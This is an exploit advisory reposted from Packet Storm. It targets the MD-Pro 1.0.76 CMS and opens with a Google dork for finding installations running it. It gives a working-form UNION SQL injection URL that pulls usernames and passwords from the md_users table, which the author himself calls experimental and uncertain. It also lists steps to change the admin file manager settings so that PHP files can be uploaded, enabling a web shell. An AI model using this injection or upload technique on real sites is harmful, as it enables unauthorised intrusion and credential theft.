MD-Pro 1.0.76 Shell Upload / SQL Injection

MD-Pro 1.0.76 Shell Upload / SQL Injection
2024-10-5 07:47:13 Author: packetstormsecurity.com(查看原文) 阅读量:3 收藏

# Exploit Title: MD-Pro 1.0.76. ( SQL injection + shell upload )
# Google Dork: intext: Powered by MD-Pro
# Date: 2024-08-30
# Exploit Author: Emiliano Febbi
# Vendor Homepage: https://www.opensourcecms.com/wp-content/uploads/MDPro-website-description.png
# Software Link: https://www.opensourcecms.com/mdpro/
# Version: 1.0.76.
# Tested on: Windows 10        :::   :::   :::::::::                :::::::::  :::::::::   :::::::: 
      :+:+: :+:+:  :+:    :+:               :+:    :+: :+:    :+: :+:    :+: 
    +:+ +:+:+ +:+ +:+    +:+               +:+    +:+ +:+    +:+ +:+    +:+  
   +#+  +:+  +#+ +#+    +:+ +#++:++#++:++ +#++:++#+  +#++:++#:  +#+    +:+   
  +#+       +#+ +#+    +#+               +#+        +#+    +#+ +#+    +#+    
 #+#       #+# #+#    #+#               #+#        #+#    #+# #+#    #+#     
###       ### #########                ###        ###    ###  ######## #2024
      [code] Proof of concept for MD-Pro 1.0.76. ( SQLi + shell upload )
-------------------------------------------------------------Part 1-------------------------------------------------------------------------------
The SQLi that I will introduce is an experimental stuff that I am not even 100% sure!
############################################################################################################################################################
#modules.php?op=modload&name=News&file=article&sid=-1 union all select 1,pn_name,3,4,5,6,7,pn_pass,9,10,11,12,13,14,15,16,17,18,19,20,21,22 FROM md_users--#
############################################################################################################################################################
-------------------------------------------------------------Part 2--------------------------------------------------------------------------------
Vulnerability present in the MD-Pro module ' EW FileManager ' inside the admin panel.
The extensive query is: ' index.php?module=ew_filemanager&type=admin ' of the module, now you have to make changes:
1# Go to this address * index.php?module=ew_filemanager&type=admin&func=modifyconfig * and change these fields in this way:
in default's directory of users files insert ' ./ ' or  ' ../ '
2# Add this string in both to the modifiable extensions and to those of images ' htm,html,txt,php ' AND ' jpg,jpeg,png,bmp,gif,php ' (save all).
3# Now go to File Manager (now is activated) and you can upload the shell from the basic upload form.
[/code]

文章来源: https://packetstormsecurity.com/files/182008/mdpro1076-sqlshell.txt
如有侵权请联系:admin#unsafe.sh